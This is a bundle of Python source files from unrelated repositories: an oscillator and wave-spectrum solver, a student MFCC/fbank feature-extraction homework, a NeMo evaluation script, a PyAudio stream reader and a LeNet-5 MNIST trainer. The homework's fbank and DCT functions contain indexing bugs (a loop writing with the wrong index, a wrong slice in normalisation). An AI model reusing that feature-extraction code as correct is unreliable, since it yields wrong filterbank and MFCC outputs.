spec_name = kwargs.get('spec_name', self.spec_name)
psd_x = PowerSpectrum(spec_name, *x)
x_pxx = psd_x.get_pxx(f)
return psd_x
def psd(self,f,x):
"""
Return the psd estimator of both input and output signals at frequency f for specified PowerSpectrum with given parameters x
Arguments:
f: frequency in Hz
x: PowerSpectrum parameters
Returns:
PowerSpectrum object of input and output signal
"""
H_square = 1.0/np.sqrt( (self.k-self.m*f**2)**2 + (self.c*f)**2 )
psd_x = self.x_psd(f, x)
y_pxx = H_square * psd_x.pxx
psd_y = PowerSpectrum('SDOF')
psd_y.set_psd(psd_x.f, y_pxx)
return psd_x, psd_y
def _linear_oscillator(self, x, seed=None,out_responses='ALL'):
"""
Solving linear oscillator in frequency domain
m x'' + c x' + k x = f =>
x'' + 2*zeta*omega_n x' + omega_n**2 x = 1/m f, where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
default value: omega_n = 0.15 Hz, zeta = 0.01
f: frequency in Hz
t: array, A sequence of time points for which to solve for y.
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
assert len(x) == self.ndim_spec, "Expecting {:d} variables but {:d} given".format(self.ndim_spec, len(x))
t = np.arange(0,int(self.tmax/self.dt) +1) * self.dt
tmax = t[-1]
df = 0.5/tmax
f = np.arange(len(t)+1) * df
##--------- oscillator properties -----------
psd_x, psd_y = self.psd(f, x)
t0, x_t = psd_x.gen_process(seed=seed)
t1, y_t = psd_y.gen_process(seed=seed)
assert (t0==t1).all()
y_raw = np.vstack((t0, x_t, y_t)).T
uqra.blockPrint()
y_QoI = uqra.get_stats(y_raw, out_responses=out_responses, out_stats=self.out_stats, axis=0)
uqra.enablePrint()
return y_raw, y_QoI
def map_domain(self, u, u_cdf):
"""
mapping random variables u from distribution dist_u (default U(0,1)) to self.distributions
Argument:
u and dist_u
"""
if isinstance(u_cdf, np.ndarray):
assert (u_cdf.shape[0] == self.ndim_spec), '{:s} expecting {:d} random variables, {:s} given'.format(self.name, self.ndim_spec, u_cdf.shape[0])
if self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
else:
raise ValueError('Distribution name not defined: {:s}'.format(self.distributions.__name__))
else:
u, dist_u = super().map_domain(u, u_cdf)
u_cdf = np.array([idist.cdf(iu) for iu, idist in zip(u, dist_u)])
if self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
else:
raise ValueError('Distribution name not defined: {:s}'.format(self.distributions.__name__))
x = x.reshape(self.ndim, -1)
return x
class duffing_oscillator(SolverBase):
"""
Solve the Duffing oscillator in time domain solved by Runge-Kutta RK4
m x'' + c x' + k x + s x^3 = f
=> x'' + 2*zeta*omega_n*x' + omega_n^2*x + s/m x^3 = 1/m * f
where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
Default value:
- mcks : [1. 0.01 0.1 0.02]
- zeta : 0.01
- omega_n : 2 rad/s
>> Nonlinear spring term: omega_n^2*x + s/m x^3
1. Hardening spring: s > 0
2. Softening spring: s < 0
|(s/m) / (omega_n^2)| => |s / k| ~ 0.1, reference Doostan:[0.25, 0.75]
default: s = 0.2 k, => s/m = 0.2*omega_n^2 = 0.0045
f : frequency in Hz
dt : scalar, time step
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
def __init__(self, **kwargs):
super().__init__()
self.name = 'Duffing oscillator'
self.nickname = 'Duffing'
self.spec_name = kwargs.get('spec_name', None)
self.ndim_spec = PowerSpectrum(self.spec_name).ndim
self.ndim = self.ndim_spec + int(0) ## need to change when cmk are also random
self.excitation = kwargs.get('excitation', None)
self.out_responses= kwargs.get('out_responses', 'ALL')
self.out_stats = kwargs.get('out_stats', ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin', 'up_crossing'])
self.axis = kwargs.get('axis', 0)
self.tmax = kwargs.get('time_max', 1000)
self.tmax = kwargs.get('tmax', 1000)
self.dt = kwargs.get('dt', 0.1)
self.y0 = kwargs.get('y0', [1,0]) ## initial condition
self.distributions= kwargs.get('environment', Kvitebjorn)
self.dist_name = self.distributions.__name__.split('.')[-1]
self.n_short_term= kwargs.get('n_short_term', 10) ## number of short term simulations
self.method = kwargs.get('method', 'RK45')
### two ways defining mcks
if 'k' in kwargs.keys() and 'c' in kwargs.keys():
self.m = kwargs.get('m', 1)
self.k = kwargs['k']
self.c = kwargs['c']
self.s = kwargs.get('s', 0.2* self.k)
# self.zeta = self.c/(2*np.sqrt(self.m*self.k))
# self.omega_n= 2*np.pi*np.sqrt(self.k/self.m) # rad/s
else:
self.zeta = kwargs.get('zeta', 0.01)
self.omega_n= kwargs.get('omega_n', 2) # rad/s
self.m = kwargs.get('m', 1)
self.k = (self.omega_n/2/np.pi) **2 * self.m
self.c = self.zeta * 2 * np.sqrt(self.m * self.k)
self.s = kwargs.get('s', 0.2 * self.k)
self.mcks = (self.m, self.c, self.k, self.s)
def __str__(self):
message = 'Duffing Oscillator: \n' + \
' - {:<15s} : {}\n'.format('mcks' , np.around(self.mcks, 2)) + \
' - {:<15s} : {}\n'.format('excitation', self.excitation.__name__ if self.excitation else self.spec_name) + \
' - {:<15s} : {}\n'.format('out_responses', self.out_responses) + \
' - {:<15s} : {}\n'.format('time_max' , self.tmax) + \
' - {:<15s} : {}\n'.format('dt' , self.dt)
return message
def run(self, x, return_all=False, random_seed=None, **kwargs):
"""
solving duffing equation:
Arguments:
x, power spectrum parameters, ndarray of shape (nsamples, n_parameters)
"""
np.random.seed(random_seed)
n_short_term = kwargs.get('n_short_term', self.n_short_term)
out_responses = kwargs.get('out_responses', self.out_responses)
x = np.array(x.T, copy=False, ndmin=2)
pbar_x = tqdm(x, ascii=True, desc=" - ")
y_QoI = []
seeds = np.random.randint(0, int(2**32-1), size=n_short_term)
for ishort_term in range(n_short_term):
pbar_x = tqdm(x, ascii=True, desc=" - {:d}/{:d} ".format(ishort_term, self.n_short_term))
y_raw_, y_QoI_ = map(list, zip(*[self._duffing_oscillator(ix, seed=seeds[ishort_term], out_responses=out_responses) for ix in pbar_x]))
y_QoI.append(y_QoI_)
if return_all:
np.save('{:s}_raw{:d}'.format(self.nickname,ishort_term), np.array(y_raw_))
return np.array(y_QoI)
def map_domain(self, u, dist_u):
"""
Mapping random variables u from distribution dist_u (default U(0,1)) to self.distributions
Argument:
u and dist_u
"""
### convert dist_u to list and append to dist_u with U(0,1) if necessary to make sure the dimension matches
u, dist_u = super().map_domain(u, dist_u)
u_cdf = np.array([idist.cdf(iu) for iu, idist in zip(u, dist_u)])
assert (u_cdf.shape[0] == self.ndim_spec), '{:s} expecting {:d} random variables, {:d} given'.format(self.name, self.ndim_spec, u_cdf.shape[0])
if isinstance(self.distributions, list):
x = np.array([idist.ppf(iu_cdf) for iu_cdf, idist in zip(u_cdf, self.distributions)])
elif self.distributions.__name__ == 'uqra.environment.Kvitebjorn':
x = Kvitebjorn.ppf(u_cdf)
x = x.reshape(self.ndim, -1)
return x
def _duffing_oscillator(self, x, seed=None, out_responses='ALL'):
assert len(x) == self.ndim_spec, "Expecting {:d} variables but {:d} given".format(self.ndim_spec, len(x))
t = np.arange(0,int(self.tmax/self.dt) +1) * self.dt
self.excitation = self._excitation_func(x, seed=seed)
x_t = self.excitation(t)
solution = sp.integrate.solve_ivp(self._rhs_odes, [0,self.tmax], self.y0, t_eval=t, args=[self.excitation],method=self.method)
y_raw = np.vstack((t, x_t, solution.y)).T
uqra.blockPrint()
y_QoI = uqra.get_stats(y_raw, out_responses=out_responses, out_stats=self.out_stats, axis=0)
uqra.enablePrint()
return y_raw, y_QoI
def _rhs_odes(self, t, y, f):
"""
Reformulate 2nd order ODE to a system of ODEs.
dy / dt = f(t, y)
Here t is a scalar,
Let u = y, v = y', then:
u' = v
v' = -2*zeta*omega_n*v - omega_n^2*u - s/m u^3 + 1/m * f
Arguments:
t: scalar
y: ndarray has shape (n,), e.g. [y, y']
f: callable function taken t as argument
Return:
(u', v')
"""
y0, y1 = y
vdot =1.0/self.m * (-self.c *y1 - self.k*y0 - self.s * y0**3 + f(t))
return y1, vdot
# V = lambda x: beta/4 * x**4 - alpha/2 * x**2
# dVdx = lambda x: beta*x**3 - alpha*x
# x, xdot = X
# if source_interp is None:
# xdotdot = -dVdx(x) -delta * xdot + gamma * np.cos(omega*t)
# else:
# xdotdot = -dVdx(x) -delta * xdot + gamma * np.cos(omega*t) + source_interp(t)
# return xdot, xdotdot
def _excitation_func(self, x, seed=None):
"""
Return the excitation function f on the right hand side
Returns:
a function take scalar argument
"""
if self.excitation is not None:
f = self.excitation
else:
if self.spec_name is not None:
t = np.arange(0,int(1.10* self.tmax/self.dt)) * self.dt
tmax = t[-1]
df = 0.5/tmax
freq = np.arange(len(t)+1) * df
psd_x = PowerSpectrum(self.spec_name, *x)
x_pxx = psd_x.get_pxx(freq)
t0, x_t = psd_x.gen_process(seed=seed)
f = sp.interpolate.interp1d(t0, x_t,kind='cubic')
else:
f = lambda t: t * 0
return f
# def _cal_normalize_values(zeta,omega0,source_kwargs, *source_args):
# TF = lambda w : 1.0/np.sqrt((w**2-omega0**2)**2 + (2*zeta*omega0)**2)
# spec_dict = psd.get_spec_dict()
# spec_name = source_kwargs.get('name','JONSWAP') if source_kwargs else 'JONSWAP'
# spec_side = source_kwargs.get('sides', '1side') if source_kwargs else '1side'
# spec_func = spec_dict[spec_name]
# nquads = 100
# if spec_side.upper() in ['2','2SIDE','DOUBLE','2SIDES']:
# x, w = np.polynomial.hermite_e.hermegauss(nquads)
# elif spec_side.upper() in ['1','1SIDE','SINGLE','1SIDES']:
# x, w = np.polynomial.laguerre.laggauss(nquads)
# else:
# raise NotImplementedError("Spectrum side type '{:s}' is not defined".format(spec_side))
# _,spec_vals = spec_func(x, *source_args)
# spec_vals = spec_vals.reshape(nquads,1)
# TF2_vals = (TF(x)**2).reshape(nquads,1)
# w = w.reshape(nquads,1)
# norm_y = np.sum(w.T *(spec_vals*TF2_vals))/(2*np.pi)
# norm_y = 1/norm_y**0.5
# norm_t = omega0
# return norm_t, norm_y
# def _normalize_source_func(source_func, norm_t, norm_y):
# def wrapper(*args, **kwargs):
# t, y = source_func(*args, **kwargs)
# return t*norm_t, y*norm_y/ norm_t**2
# return wrapper
# def duffing_oscillator(tmax,dt,x0,v0,zeta,omega0,mu,\
# *source_args, source_func=None, source_kwargs=None,t_trans=0, normalize=False):
# if normalize:
# # norm_t, norm_y = normalize[1], normalize[2]
# norm_t, norm_y = _cal_normalize_values(zeta, omega0, source_kwargs)
# # print('Normalizing value: [{:.2f}, {:.2f}]'.format(norm_t, norm_y))
# assert norm_t!= 0
# delta = 2 * zeta * omega0 / norm_t
# alpha = omega0**2 / norm_t**2
# beta = mu*omega0**2/(norm_y**2 * norm_t**2)
# # print('delta:{:.2f}, alpha: {:.2f}, beta: {:.2f}'.format(delta, alpha, beta))
# dt_per_period = int(2*np.pi/omega0/dt)
# tmax = norm_t*tmax
# dt = norm_t* dt
# source_func = _normalize_source_func(source_func, norm_t, norm_y) if source_func else source_func
# source_args = source_args/omega0 if source_args else source_args
# gamma,omega = 0,1 # gamma ==0 with arbitrary omega
# t, X, dt, pstep = duffing_equation(tmax,dt_per_period,x0,v0,gamma,delta,omega,\
# *source_args, source_func=source_func, source_kwargs=source_kwargs,\
# t_trans=t_trans, alpha=alpha, beta=beta)
# else:
# delta = 2 * zeta * omega0
# alpha = omega0**2
# beta = omega0**2 * mu
# dt_per_period = int(2*np.pi/omega0/dt)
# gamma,omega = 0,1 # gamma ==0 with arbitrary omega
# t, X, dt, pstep = duffing_equation(tmax,dt_per_period,x0,v0,gamma,delta,omega,\
# *source_args, source_func=source_func, source_kwargs=source_kwargs,\
# t_trans=t_trans, alpha=alpha, beta=beta)
# t = np.reshape(t,(len(t),1))
# res = np.concatenate((t,X),axis=1)
# return res, dt, pstep
# def duffing_equation(tmax, dt_per_period, x0, v0,gamma,delta,omega,\
# *source_args, source_func=None, source_kwargs=None,alpha=1,beta=1,t_trans=0):
# """
# Solve the Duffing equation for parameters gamma, delta, omega.
# https://scipython.com/blog/the-duffing-oscillator/
# Find the numerical solution to the Duffing equation using a suitable
# time grid:
# - tmax is the maximum time (s) to integrate to;
# - t_trans is the initial time period of transient behaviour until the solution settles down (if it does) to some kind of periodic motion (these data
# points are dropped) and
# - dt_per_period is the number of time samples (of duration dt) to include per period of the driving motion (frequency omega).
# x'' + delta x' + alpha x + beta x^3 = gamma * cos(omega t)
# x(0) = x'(0)
# Returns the time grid, t (after t_trans), position, x, and velocity,
# xdot, dt, and step, the number of array points per period of the driving
# motion.
# """
# # Time point spacings and the time grid
# period = 2*np.pi/omega
# dt = int(2*np.pi/omega / dt_per_period * 1000)/1000
# step = int(period / dt)
# t = np.arange(0, tmax, dt)
# # Initial conditions: x, xdot
# X0 = [x0, v0]
# if callable(source_func):
# _t = np.arange(0, tmax+period, dt)
# _, source = source_func(_t, *source_args, kwargs=source_kwargs)
# source_interp = sp.interpolate.interp1d(_t, source,kind='cubic')
# else:
# source_interp = None
# X = odeint(_deriv, X0, t, args=(gamma, delta, omega,alpha, beta, source_interp))
# idx = int(t_trans / dt)
# return t[idx:], X[idx:], dt, step
# def lin_oscillator(tmax,dt,x0,v0,zeta,omega0,source_func=None,t_trans=0, *source_args):
# source_func = source_func if callable(source_func) else 0
# x = duffing_oscillator(tmax,dt,x0,v0,zeta,omega0,0,source_func=source_func,t_trans=t_trans)
# return x
```
#### File: uqra/solver/spectrums.py
```python
import numpy as np
def jonswap(w, Hs, Tp):
""" JONSWAP wave spectrum, IEC 61400-3
w: ndarray of shape (n,), frequencies to be sampled at, rad/s
Hs: significant wave height, m
Tp: wave peak period, sec
"""
w = np.squeeze(w)
with np.errstate(divide='ignore'):
wp = 2*np.pi/Tp
gamma = 3.3
sigma = 0.07 * np.ones(w.shape)
sigma[w > wp] = 0.09
assert w[0] >= 0 ,'Single side power spectrum start with frequency greater or eqaul to 0, w[0]={:4.2f}'.format(w[0])
JS1 = 5/16 * Hs**2 * wp**4 * w**-5
JS2 = np.exp(-1.25*(w/wp)**-4) * (1-0.287*np.log(gamma))
JS3 = gamma**(np.exp(-0.5*((w-wp)/sigma/wp)**2))
JS1[np.isinf(JS1)] = 0
JS2[np.isinf(JS2)] = 0
JS3[np.isinf(JS3)] = 0
JS = JS1 * JS2 * JS3
return w, JS
def spec_test1(w, c=2):
"""
Test FFT and iFFT for spectrum and acf
F(w) = Fourier(f(t))
where
F(w) = 2c / (c**2 + w**2)
f(t) = e^(-c|t|)
Arguments:
w: frequencies to be evaluated at (Hz)
c: arbitrary real constant larger than 0
Returns:
Sw: psd value at specified w
sa: approximated area under psd curve with specified w
"""
# print('\t{:s} : c= {:.2f}'.format(spec_test1.__name__, c))
Sw = 2*c/(c**2 + w**2)
dw = w[1] - w[0]
sa = np.sum(Sw*dw)
return w, Sw
def white_noise(w, F0=1,a=0,b=5):
Sw = F0
sa = abs(b-a) * F0
return w, Sw
```
#### File: uqra/utilities/classes.py
```python
import numpy as np
import sys, os
from datetime import datetime
class Logger(object):
def __init__(self):
self.terminal = sys.stdout
self.log = open("logfile.log", "w+")
now = datetime.now()
date_string = now.strftime("%d/%m/%Y %H:%M:%S")
logtext ='-'*50+'\n' + date_string +'\n'
self.log.write(logtext)
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
#this flush method is needed for python 3 compatibility.
#this handles the flush command by doing nothing.
#you might want to specify some extra behavior here.
pass
``` |
{
"source": "jinsongpan/ASR_Course_Homework",
"score": 3
} |
#### File: ASR_Course_Homework/02-feature-extraction/mfcc.py
```python
import librosa
import numpy as np
# from scipy.fftpack import dct
import pdb
# If you want to see the spectrogram picture
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def plot_spectrogram(spec, note, file_name):
"""Draw the spectrogram picture
:param spec: a feature_dim by num_frames array(real)
:param note: title of the picture
:param file_name: name of the file
"""
fig = plt.figure(figsize=(20, 5))
heatmap = plt.pcolor(spec)
fig.colorbar(mappable=heatmap)
plt.xlabel('Time(s)')
plt.ylabel(note)
plt.tight_layout()
plt.savefig(file_name)
# preemphasis config
alpha = 0.97
# Enframe config
frame_len = 400 # 25ms, fs=16kHz
frame_shift = 160 # 10ms, fs=16kHz
fft_len = 512
# Mel filter config
num_filter = 23
num_mfcc = 12
# Read wav file
wav, fs = librosa.load('./test.wav', sr=None)
# Enframe with Hamming window function
def preemphasis(signal, coeff=alpha):
"""perform preemphasis on the input signal.
:param signal: The signal to filter.
:param coeff: The preemphasis coefficient. 0 is no filter, default is 0.97.
:returns: the filtered signal.
"""
return np.append(signal[0], [signal[1:] - coeff * signal[:-1]])
def enframe(signal, frame_len=frame_len, frame_shift=frame_shift, win=np.hamming(frame_len)):
"""Enframe with Hamming widow function.
:param signal: The signal be enframed
:param win: window function, default Hamming
:returns: the enframed signal, num_frames by frame_len array
"""
num_samples = signal.size
num_frames = np.floor((num_samples - frame_len) / frame_shift) + 1
frames = np.zeros((int(num_frames), frame_len))
for i in range(int(num_frames)):
frames[i, :] = signal[i * frame_shift:i * frame_shift + frame_len]
frames[i, :] = frames[i, :] * win
return frames
def get_spectrum(frames, fft_len=fft_len):
"""Get spectrum using fft
:param frames: the enframed signal, num_frames by frame_len array
:param fft_len: FFT length, default 512
:returns: spectrum, a num_frames by fft_len/2+1 array (real)
"""
cFFT = np.fft.fft(frames, n=fft_len)
valid_len = int(fft_len / 2) + 1
spectrum = np.abs(cFFT[:, 0:valid_len])
return spectrum # num_frames*valid_len
def fbank(spectrum, num_filter=num_filter):
"""Get mel filter bank feature from spectrum
:param spectrum: a num_frames by fft_len/2+1 array(real)
:param num_filter: mel filters number, default 23
:returns: fbank feature, a num_frames by num_filter array
DON'T FORGET LOG OPERATION AFTER MEL FILTER!
"""
feats = np.zeros((int(fft_len / 2 + 1), num_filter))
"""
FINISH by YOURSELF
"""
# step1: 获得滤波器数目在梅尔刻度上的中心频率
low_mel_freq = 0.0
high_mel_freq = 2595 * np.log10(1 + (fs / 2) / 700)
mel_points = np.linspace(low_mel_freq, high_mel_freq, num_filter + 2)
# step2: 获得对应FFT单元的中心频率
fft_points = 700 * (10 ** (mel_points / 2595) - 1)
# # step3: 计算音频帧的能量谱
# pow_frames = ((1.0 / fft_len) * (spectrum ** 2))
# step3: 计算mel滤波器组
bin = (fft_points / (fs / 2)) * (fft_len / 2)
for i in range(1, num_filter + 1):
left = int(bin[i - 1])
center = int(bin[i])
right = int(bin[i + 1])
for j in range(left, center):
feats[j + 1, i - 1] = (j + 1 - bin[i - 1]) / (bin[i] - bin[i - 1])
for k in range(center, right):
feats[j + 1, i - 1] = (bin[i + 1] - (j + 1)) / (bin[i + 1] - bin[i])
# step4: 计算fbank值并取log
feats = np.dot(spectrum, feats)
feats = 20 * np.log10(feats)
# pdb.set_trace()
return feats
def mfcc(fbank, num_mfcc=num_mfcc):
"""Get mfcc feature from fbank feature
:param fbank: a num_frames by num_filter array(real)
:param num_mfcc: mfcc number, default 12
:returns: mfcc feature, a num_frames by num_mfcc array
"""
# feats = np.zeros((fbank.shape[0], num_mfcc))
"""
FINISH by YOURSELF
"""
def selfdct(x, axis=1, norm="ortho"):
"""scipy.pack.fft.dct()中离散余弦变换的python实现"""
y = np.zeros(x.shape, dtype=float)
if axis == 0:
N = y.shape[0]
for i in range(y.shape[1]):
for j in range(y.shape[0]):
for k in range(y.shape[0]):
y[j][i] += x[k][i] * np.cos(np.pi * j * (2 * k + 1) / (2 * N))
if norm == "ortho":
y[0, i] = 2 * y[0, i] / np.sqrt(4 * N)
y[:1, i] = 2 * y[:1, i] / np.sqrt(2 * N)
else:
y[:, i] = 2 * y[:, i]
elif axis == 1:
N = y.shape[1]
for i in range(y.shape[0]):
for j in range(y.shape[1]):
for k in range(y.shape[1]):
y[i][j] += x[i][k] * np.cos(np.pi * j * (2 * k + 1) / (2 * N))
if norm == "ortho":
y[i, 0] = 2 * y[i, 0] / np.sqrt(4 * N)
y[i, 1:] = 2 * y[i, 1:] / np.sqrt(2 * N)
else:
y[i, :] = 2 * y[i, :]
else:
raise ValueError("需要指定dct计算的维度,axis=0 or 1 ...")
return y
feats = selfdct(fbank, axis=1, norm='ortho')[:, 1:num_mfcc+1]
return feats
def write_file(feats, file_name):
"""Write the feature to file
:param feats: a num_frames by feature_dim array(real)
:param file_name: name of the file
"""
f = open(file_name, 'w')
(row, col) = feats.shape
for i in range(row):
f.write('[')
for j in range(col):
f.write(str(feats[i, j]) + ' ')
f.write(']\n')
f.close()
def main():
wav, fs = librosa.load('./test.wav', sr=None)
signal = preemphasis(wav)
frames = enframe(signal)
spectrum = get_spectrum(frames)
fbank_feats = fbank(spectrum)
mfcc_feats = mfcc(fbank_feats)
# print("fbank_feats", fbank_feats[0])
# print("mfcc_feats", mfcc_feats[0])
plot_spectrogram(fbank_feats, 'Filter Bank', 'fbank.png')
write_file(fbank_feats, './test.fbank')
plot_spectrogram(mfcc_feats.T, 'MFCC', 'mfcc.png')
write_file(mfcc_feats, './test.mfcc')
if __name__ == '__main__':
main()
```
#### File: ASR_Course_Homework/05-GMM-HMM/convert_fmt.py
```python
from __future__ import print_function
import sys
def usage() :
print("convert_fmt.py : convert e6897 dcd fmt to evaluation fmt")
print(" usage : python convert_fmt.py e6870_fmt eva_fmt")
if __name__ == '__main__':
if len(sys.argv) == 1 :
usage()
sys.exit(0)
dcd_file = sys.argv[1]
eva_file = sys.argv[2]
with open(eva_file,'w') as eva_f:
for line in open(dcd_file, 'r') :
array = line.rstrip('\n').split()
out_array = [array[-1]] + [ i for i in array[:-1] if i !='~SIL']
eva_f.write(' '.join(out_array) + '\n')
``` |
{
"source": "jinsongpan/NeMo",
"score": 2
} |
#### File: nlp/text_classification/model_parallel_text_classification_evaluation.py
```python
import pytorch_lightning as pl
from omegaconf import DictConfig
from nemo.collections.nlp.models.text_classification import TextClassificationModel
from nemo.collections.nlp.parts.nlp_overrides import NLPDDPPlugin
from nemo.core.config import hydra_runner
from nemo.utils import logging
from nemo.utils.exp_manager import exp_manager
@hydra_runner(config_path="conf", config_name="text_classification_config")
def main(cfg: DictConfig) -> None:
logging.info(f'\nConfig Params:\n{cfg.pretty()}')
trainer = pl.Trainer(plugins=[NLPDDPPlugin()], **cfg.trainer)
exp_manager(trainer, cfg.get("exp_manager", None))
model = TextClassificationModel.restore_from(cfg.model.nemo_path, trainer=trainer)
model.setup_test_data(test_data_config=cfg.model.test_ds)
trainer.test(model=model, ckpt_path=None)
if __name__ == '__main__':
main()
``` |
{
"source": "jinsongpan/Realtime_PyAudio_FFT",
"score": 3
} |
#### File: Realtime_PyAudio_FFT/src/stream_reader_pyaudio.py
```python
import numpy as np
import pyaudio
import time, sys, math
from collections import deque
from src.utils import *
class Stream_Reader:
"""
The Stream_Reader continuously reads data from a selected sound source using PyAudio
Arguments:
device: int or None: Select which audio stream to read .
rate: float or None: Sample rate to use. Defaults to something supported.
updatesPerSecond: int: How often to record new data.
"""
def __init__(self,
device = None,
rate = None,
updates_per_second = 1000,
FFT_window_size = None,
verbose = False):
self.rate = rate
self.verbose = verbose
self.pa = pyaudio.PyAudio()
#Temporary variables #hacks!
self.update_window_n_frames = 1024 #Don't remove this, needed for device testing!
self.data_buffer = None
self.device = device
if self.device is None:
self.device = self.input_device()
if self.rate is None:
self.rate = self.valid_low_rate(self.device)
self.update_window_n_frames = round_up_to_even(self.rate / updates_per_second)
self.updates_per_second = self.rate / self.update_window_n_frames
self.info = self.pa.get_device_info_by_index(self.device)
self.data_capture_delays = deque(maxlen=20)
self.new_data = False
if self.verbose:
self.data_capture_delays = deque(maxlen=20)
self.num_data_captures = 0
self.stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
rate = self.rate,
input=True,
frames_per_buffer = self.update_window_n_frames,
stream_callback=self.non_blocking_stream_read)
print("\n##################################################################################################")
print("\nDefaulted to using first working mic, Running on:")
self.print_mic_info(self.device)
print("\n##################################################################################################")
print('Recording from %s at %d Hz\nUsing (non-overlapping) data-windows of %d samples (updating at %.2ffps)'
%(self.info["name"],self.rate, self.update_window_n_frames, self.updates_per_second))
def non_blocking_stream_read(self, in_data, frame_count, time_info, status):
if self.verbose:
start = time.time()
if self.data_buffer is not None:
self.data_buffer.append_data(np.frombuffer(in_data, dtype=np.int16))
self.new_data = True
if self.verbose:
self.num_data_captures += 1
self.data_capture_delays.append(time.time() - start)
return in_data, pyaudio.paContinue
def stream_start(self, data_windows_to_buffer = None):
self.data_windows_to_buffer = data_windows_to_buffer
if data_windows_to_buffer is None:
self.data_windows_to_buffer = int(self.updates_per_second / 2) #By default, buffer 0.5 second of audio
else:
self.data_windows_to_buffer = data_windows_to_buffer
self.data_buffer = numpy_data_buffer(self.data_windows_to_buffer, self.update_window_n_frames)
print("\n--🎙 -- Starting live audio stream...\n")
self.stream.start_stream()
self.stream_start_time = time.time()
def terminate(self):
print("👋 Sending stream termination command...")
self.stream.stop_stream()
self.stream.close()
self.pa.terminate()
def valid_low_rate(self, device, test_rates = [44100, 22050]):
"""Set the rate to the lowest supported audio rate."""
for testrate in test_rates:
if self.test_device(device, rate=testrate):
return testrate
#If none of the test_rates worked, try the default rate:
self.info = self.pa.get_device_info_by_index(device)
default_rate = int(self.info["defaultSampleRate"])
if self.test_device(device, rate=default_rate):
return default_rate
print("SOMETHING'S WRONG! I can't figure out a good sample-rate for DEVICE =>", device)
return default_rate
def test_device(self, device, rate=None):
"""given a device ID and a rate, return True/False if it's valid."""
try:
self.info = self.pa.get_device_info_by_index(device)
if not self.info["maxInputChannels"] > 0:
return False
if rate is None:
rate = int(self.info["defaultSampleRate"])
stream = self.pa.open(
format = pyaudio.paInt16,
channels = 1,
input_device_index=device,
frames_per_buffer=self.update_window_n_frames,
rate = rate,
input = True)
stream.close()
return True
except Exception as e:
#print(e)
return False
def input_device(self):
"""
See which devices can be opened for microphone input.
Return the first valid device
"""
mics=[]
for device in range(self.pa.get_device_count()):
if self.test_device(device):
mics.append(device)
if len(mics) == 0:
print("No working microphone devices found!")
sys.exit()
print("Found %d working microphone device(s): " % len(mics))
for mic in mics:
self.print_mic_info(mic)
return mics[0]
def print_mic_info(self, mic):
mic_info = self.pa.get_device_info_by_index(mic)
print('\nMIC %s:' %(str(mic)))
for k, v in sorted(mic_info.items()):
print("%s: %s" %(k, v))
``` |
{
"source": "jinsoo9595/LeNet_5-pytorch",
"score": 3
} |
#### File: jinsoo9595/LeNet_5-pytorch/main.py
```python
from lenet import LeNet5
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision.datasets.mnist import MNIST
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import visdom
import onnx
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
from sklearn.manifold import TSNE
import seaborn as sns
# Pytorch visualization tool
viz = visdom.Visdom()
# Visdom plot setting
cur_batch_window = None
cur_batch_window_opts = {
'title': 'Epoch Loss Trace',
'xlabel': 'Batch Number',
'ylabel': 'Loss',
'width': 1200,
'height': 600,
}
# Resize MNIST data size to 32x32
data_train = MNIST('./data/mnist',
download=True,
transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor()]))
data_test = MNIST('./data/mnist',
train=False,
download=True,
transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor()]))
# Dataloader
# - dataset
# - shuffle(bool): to have the data reshuffled at every epoch
# - num_workers: how many subprocesses to use for data loading
data_train_loader = DataLoader(data_train, batch_size=256, shuffle=True, num_workers=8)
data_test_loader = DataLoader(data_test, batch_size=1024, num_workers=8)
# constructor of class
net = LeNet5()
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=2e-3)
activation = {}
def get_activation(name):
def hook(model, input, output):
activation[name] = output.detach()
return hook
def feature_map_vis(epoch, num):
act = activation['c1'].squeeze()
fig, axarr = plt.subplots(act.size(1), 10)
# title for entire figure
fig.suptitle('LeNet-5 feature map', fontsize=20)
for idx1 in range(10):
for idx2 in range(act.size(1)):
axarr[idx2, idx1].imshow(act[idx1, idx2, :, :], cmap='gray')
fig.savefig('./Feature_map/Feature Map ' + str(epoch) + '_' + str(num) + '.png')
def t_SNE(output, labels, epoch, num):
#extract last features only
tsne = TSNE(n_components=2, perplexity=10, n_iter=300)
tsne_ref = tsne.fit_transform(output.detach().numpy())
df = pd.DataFrame(tsne_ref, index=tsne_ref[0:,1])
df['_DIM_1_'] = tsne_ref[:,0]
df['_DIM_2_'] = tsne_ref[:,1]
df['Label'] = labels[:]
sns.set_context("notebook", font_scale=1.1)
sns.set_style("ticks")
sns.lmplot(x='_DIM_1_',
y='_DIM_2_',
data=df,
fit_reg=False,
legend=True,
size=9,
hue='Label',
scatter_kws={"s":200, "alpha":0.3})
plt.title('t-SNE Results MNIST', weight='bold').set_fontsize('14')
plt.xlabel('Dimension 1', weight='bold').set_fontsize('10')
plt.ylabel('Dimension 2', weight='bold').set_fontsize('10')
plt.show
plt.savefig('./t_SNE/Classification ' + str(epoch) + '_' + str(num) + '.png')
def train(epoch):
global cur_batch_window
net.train()
loss_list, batch_list = [], []
for i, (images, labels) in enumerate(data_train_loader):
# optimizer init
optimizer.zero_grad()
net.c1.register_forward_hook(get_activation('c1'))
# LeNet5 processing
output = net(images)
# compare output & lables
loss = criterion(output, labels)
# loss & batch list add content
# detach(): same content, new Tensor with different require_grad(calculated log)
loss_list.append(loss.detach().cpu().item())
batch_list.append(i+1)
# Print params
if i % 10 == 0:
print('Train - Epoch %d, Batch: %d, Loss: %f' % (epoch, i, loss.detach().cpu().item()))
